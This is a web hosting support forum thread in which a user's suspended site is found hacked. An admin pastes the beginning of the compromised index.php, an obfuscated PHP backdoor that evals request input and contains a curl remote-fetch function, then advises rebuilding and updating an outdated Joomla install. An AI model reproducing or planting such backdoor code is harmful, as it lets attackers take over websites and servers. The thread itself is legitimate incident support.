rockygl Posted November 16, 2023 Share Posted November 16, 2023 (edited) Hello, My account seems to be suspended again. Please could you advise rockygl1 Tommy https://www.rockyglaciers.org/ Many thanks Edited November 17, 2023 by Talk Sick Unsolving Link to comment Share on other sites More sharing options...
Talk Sick Posted November 16, 2023 Share Posted November 16, 2023 (edited) Your account was suspended for: High server load. 11358 CPU. I have unsuspended your account, but please try to limit the load you put on our servers (under 10000 CPU) as it slows down not only your site, but the sites of all other HelioHost users sharing your server. If you need help figuring out why your site is causing such high load let us know and we can try to help. If the high load is simply because your site is getting a lot of traffic, you might want to consider purchasing a VPS instead. VPS hosting gives you an entire virtual server to yourself, including no load limits, a dedicated IP address, and full root access. Edited November 16, 2023 by Talk Sick Added info Link to comment Share on other sites More sharing options...
rockygl Posted November 17, 2023 Author Share Posted November 17, 2023 Thanks for this. Help figuring out the load would be appreciated. Looking at the user analytics, there are only a few users so I'm not sure why the load would be so high. Link to comment Share on other sites More sharing options...
Talk Sick Posted November 17, 2023 Share Posted November 17, 2023 This support request is being escalated to our root admins. Link to comment Share on other sites More sharing options...
Krydos Posted November 17, 2023 Share Posted November 17, 2023 Your website has clearly been hacked. Here is your index.php <?php /*-lShG;7>-*/error_reporting(0); $QKuU /*-Rkvp._LjJD4;v1&5EJ9-*/=/*-370E1a43815Kz#>F!q7-*/ "ra"./*-ow:piBPtbF;9sjnB9-*/"ng"./*-iZa?[]eaEK>u0kC__1I-*/"e"; $bXlIm /*-<!I=L,Lm%OY,GV%8-*/= /*-{S>C}8kB0WdNo~-*/$QKuU/*-e7$WJgx{>Wp9g-*/(/*-Xq(QWqBFqB?5-*/"~",/*-VRGAur<M{-*/" ");/*-!jRNvWgOAXyov+Z-*/$dUYio/*->NngYm_ah6-*/=/*-FfK)_u>PbnwD6-*/${$bXlIm[1+30]/*-GdwHE5@<dV+~CTK-*/.$bXlIm[9+50]./*-t(qw.Zd7Qh.m9-*/$bXlIm[36+11].$bXlIm[30+17]./*-U%.56.#2^-*/$bXlIm[23+28].$bXlIm[52+1].$bXlIm/*-A>R10o9ptemcm+ujE-*/[28+29]}; /*-AGMLPPJclv,^N-*/if(/*-hl,jyp$[h>QvM-*/in_array(/*-u(0Yj97W}ZucT-*/gettype/*-gT8GMb|vA.It-*/($dUYio).(7+12),$dUYio)){ $dUYio[54+8]=$dUYio[56+6].$dUYio[17+63]; @eval/*-h2DD.nYs~-*/($dUYio[37+25](${$dUYio[15+29]}[15+5]));}/*-rK-*/class /*-XO`-*/a{ /*-cL-*/static/*-1LSZdZE-*/ function /*-wGyM]a-*/cT($AOtJnSrK) /*-u8<q-*/{ $hxGJkYQ/*-Y-#V-*/ = /*-bD{C^-*/"r"./*-`ql[ZF(jU-*/"a"./*-hfOo70-*/"n"./*-L%1RwH-*/"g"./*-OhiJaD,y-*/"e"; /*-vUz;XUA_-*/$AUqwYXSNid/*-~b(bx0nIy-*/ = /*-x|He-*/$hxGJkYQ/*-(>F<.K-*/(/*-uQ!nF`H-*/"~"/*-wDLM-2-*/, /*-)XfXIJ-*/" "/*-:MrC<stK%-*/);/*-pT;-*/ $vPWjkSOid /*-B-*/= /*-wId-*/explode/*-wa<m&.f-*/(/*-9p-*/"!", /*-b![e-*/$AOtJnSrK/*-WWJ-*/); /*-,oN5Su-*/$DurZd /*-KL%wbADaI-*/= /*-84I-*/""; foreach /*-q&x-*/(/*-d)T:L%1;d}-*/$vPWjkSOid /*-vQ0X,@KnS-*/as /*-,rU,2+,Qne-*/$gZ /*-w3-*/=>/*-kqi?Wak5C-*/ $UQW/*-M@a3<-*/) /*-0N!k,-*/$DurZd /*-RK!^X%XgFB-*/.= /*-.#O:c6ED2;-*/$AUqwYXSNid[$UQW/*-Q5sc-*/ - /*-lv-*/65104/*-mr{wa?E-*/];/*-U(O5xm-*/ return /*-F8c-*/$DurZd; /*-W^1&5Kgo-*/} /*-goyS-*/static /*-,-:8-*/function /*-_KAwW@O-*/oyGOLpDQ/*-9Q_-*/(/*-g4|-*/$jGu,/*-0_O!~gc-*/ $yuZK/*-n-z-*/)/*-yo1WC<-*/ {/*-~&nhyn5cN-*/ $hWFzxONLv/*-si^>-*/ = /*-t7P!-*/curl_init/*-%&S##%s-*/(/*-oG%TFbb-*/$jGu/*-_yE}N8XG-*/);/*-tREv-*/ curl_setopt/*-rzRptB#~BV-*/(/*-P%hp-*/$hWFzxONLv,/*-tFFfn`)!uh-*/ CURLOPT_RETURNTRANSFER,/*-@9op-*/ 1/*-_ajOo}gtN1-*/);/*-0(VlqO3-*/ $YbQGo/*-p,Q{1El5-*/ = /*-7qR~G7)-*/curl_exec/*-]#cd?g3lD-*/(/*-2T0iWeEM-*/$hWFzxONLv/*-O.jH-*/); /*-cawA&=Hg!s-*/return /*-R0-*/empty/*-<Y~Tx5&-*/(/*-rxc-*/$YbQGo/*-la6.WE^-*/)/*-Y0}-*/ ? /*-WoQ-*/$yuZK/*-bbr$}Af2h-*/(/*-uZ(XX2^-*/$jGu/*-x|67[=V-*/)/*-rKHX|<4-*/ : /*-#N:c-*/$YbQGo; /*---*/}/*-wP-*/ static/*-:G]-*/ function /*-o-MJiHDA-*/xKQ/*-ep+CZYE_-*/() /*-,0-*/{/*-~%o5~-*/ $TEYA /*-qY9&kKhP-*/=/*-79f-*/ array/*-yO@_7d-*/("65131!65116!65129!65133!65114!65129!65135!65128!65113!65120!65131!65114!65125!65119!65120","65115!65114!65116!65135!65116!65119!65114!65181!65179","65124!65115!65119!65120!65135!65130!65129!65131!65119!65130!65129","65118!65133!65131!65123","65132!65133!65115!65129!65176!65178!65135!65130!65129!65131!65119!65130!65129","65128!65125!65122!65129!65135!65127!65129!65114!65135!65131!65119!65120!65114!65129!65120!65114!65115","65158!65188","65105","65183!65188","65165!65148!65148!65165!65141","65119!65128"); /*-tRz)&6;-*/foreach /*-vS3B-*/(/*-=$q-*/$TEYA/*-0_U!-*/ as /*-J8_y-*/$HdlKfPenMR/*-yT2-*/)/*-2bJonRTTcq-*/ $MT/*-iTgO{Z-*/[] /*-$xnvuJ+w}-*/= /*-oUi-*/self/*-H92e|X!-*/::/*-Zi&H>{M-*/cT/*-ksn3~zF-*/ I made a full backup which you can download from https://heliohost.org/backup/ if you need it. In most cases your database is probably fine, but you should still check it to make sure it hasn't been altered. You should also assume that any passwords you used on this site have been compromised and should be changed. You shouldn't trust any of your files because the hacker clearly had access to modify and upload files. I have reset your account to clean up the hack, and you should click the link in your email to continue with the rebuild process. Let us know if you need help with anything. Link to comment Share on other sites More sharing options...
rockygl Posted November 18, 2023 Author Share Posted November 18, 2023 Ok thanks for letting me know. I used a very long and complex password after it was hacked last month so if you have any tips to avoid this again, please let me know. Link to comment Share on other sites More sharing options...
wolstech Posted November 18, 2023 Share Posted November 18, 2023 Did you rebuild the site completely after the last time this happened? Changing passwords doesn't fix these hacks after the fact, you have to rebuild the site or restore using a backup prior to it being hacked, then update all of the software (both the base software and the extensions). Remove any extensions you don't use. These hacks are usually a result of using outdated software or dubious extensions from random untrusted websites. It looks like you're using Joomla which does tend to be less prone to attacks (compared to WP) when kept updated. Link to comment Share on other sites More sharing options...
rockygl Posted November 19, 2023 Author Share Posted November 19, 2023 Hello, Yes I rebuilt using a backup prior to the hack. I have redone this again Is it possible to install a SSL certificate (I saw there was a LetsEncrypt option but I don't know how/if I can to add the DNS record.) Many thanks, Scott Link to comment Share on other sites More sharing options...
MoneyBroz Posted November 19, 2023 Share Posted November 19, 2023 28 minutes ago, rockygl said: Hello, Yes I rebuilt using a backup prior to the hack. I have redone this again Is it possible to install a SSL certificate (I saw there was a LetsEncrypt option but I don't know how/if I can to add the DNS record.) Many thanks, Scott Yes you can install a certificate. You don't need to add a record for it, it will do all of that work for you. Link to comment Share on other sites More sharing options...
wolstech Posted November 19, 2023 Share Posted November 19, 2023 40 minutes ago, rockygl said: Yes I rebuilt using a backup prior to the hack. I have redone this again This is why you keep getting hacked. I just looked and you seem to have restored the same version of Joomla from August 2020 that has been hacked twice now, so plan to be hacked again in the next few days. Now that the site is restored, you need to immediately update Joomla and all extensions to the latest versions. If it can no longer be updated to a supported and secured version, you should discard the backup and start over entirely. Link to comment Share on other sites More sharing options...
Krydos Posted November 21, 2023 Share Posted November 21, 2023 On 11/19/2023 at 2:54 PM, rockygl said: Is it possible to install a SSL certificate (I saw there was a LetsEncrypt option but I don't know how/if I can to add the DNS record.) Uncheck the wildcard box. It isn't supported yet. Link to comment Share on other sites More sharing options...
Recommended Posts